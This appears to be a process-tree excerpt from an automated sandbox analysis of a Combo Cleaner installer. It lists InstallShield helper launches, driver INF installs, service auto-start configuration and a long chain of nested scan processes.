C:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exeC:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{771CDEE3-C936-45A3-9EE9-6D5A29D35AE5}4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exeC:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{F766C308-8AAE-415E-B404-85E712CCB1D6}4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exeC:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{C3A3CC8B-CDD8-4579-BC89-A2D91F43D4C3}4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exeC:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{F1905061-0DDB-4565-B4EC-EA7E12FBD71F}4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exeC:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{F6DA495C-46A1-4F23-BF95-82F07D946802}4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exeC:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{EE153FCF-BDB3-4353-9CEE-60F323960A38}4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exeC:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E396720E-F223-4F67-BDC9-3FB1CB6E1370}4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exeC:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{FC1C830C-511A-484B-AA97-4A03803725C9}4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exeC:\Users\Admin\AppData\Local\Temp\{84AB8AFB-2F8F-4C65-BDFC-85E17643927E}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{CB9B2F06-42D7-450F-9A5E-17030723A069}4⤵
-
-
C:\Windows\SysWOW64\CMD.EXECMD.EXE /C driverquery /v >C:\Users\Admin\AppData\Local\Temp\drivers.txt4⤵
-
C:\Windows\SysWOW64\driverquery.exedriverquery /v5⤵
-
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" setupapi,InstallHinfSection DefaultInstall 132 ./gzflt.inf4⤵
-
C:\Windows\system32\runonce.exe"C:\Windows\system32\runonce.exe" -r5⤵
-
C:\Windows\System32\grpconv.exe"C:\Windows\System32\grpconv.exe" -o6⤵
-
-
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" syssetup, SetupInfObjectInstallAction DefaultInstall 128 ./bddci.inf4⤵
-
C:\Windows\system32\runonce.exe"C:\Windows\system32\runonce.exe" -r5⤵
-
C:\Windows\System32\grpconv.exe"C:\Windows\System32\grpconv.exe" -o6⤵
-
-
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" syssetup,SetupInfObjectInstallAction DefaultInstall 132 ./trufos.inf4⤵
-
C:\Windows\system32\runonce.exe"C:\Windows\system32\runonce.exe" -r5⤵
-
C:\Windows\System32\grpconv.exe"C:\Windows\System32\grpconv.exe" -o6⤵
-
-
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\SysWOW64\sc.exe" config ComboCleaner.WinService start=auto4⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\SysWOW64\sc.exe" config ComboCleaner.Guard start=auto4⤵
- Launches sc.exe
-
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe"C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe" -startScan4⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan5⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan6⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan7⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan8⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan9⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan10⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan11⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan12⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan13⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan14⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan15⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan16⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan17⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan18⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan19⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan20⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan21⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan22⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan23⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan24⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan25⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan26⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan27⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan28⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan29⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan30⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan31⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan32⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan33⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan34⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan35⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan36⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan37⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan38⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan39⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan40⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan41⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan42⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan43⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan44⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan45⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan46⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan47⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan48⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan49⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan50⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan51⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan52⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan53⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan54⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan55⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan56⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan57⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan58⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan59⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan60⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan61⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan62⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan63⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan64⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan65⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan66⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan67⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan68⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan69⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan70⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan71⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan72⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan73⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan74⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan75⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan76⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan77⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan78⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan79⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan80⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan81⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan82⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan83⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan84⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan85⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan86⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan87⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan88⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan89⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan90⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan91⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan92⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan93⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan94⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan95⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan96⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan97⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan98⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan99⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan100⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan101⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan102⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan103⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan104⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan105⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan106⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan107⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan108⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan109⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan110⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan111⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan112⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan113⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan114⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan115⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan116⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan117⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan118⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan119⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan120⤵
-
C:\Program Files (x86)\Combo Cleaner\ComboCleaner.exe-startScan121⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-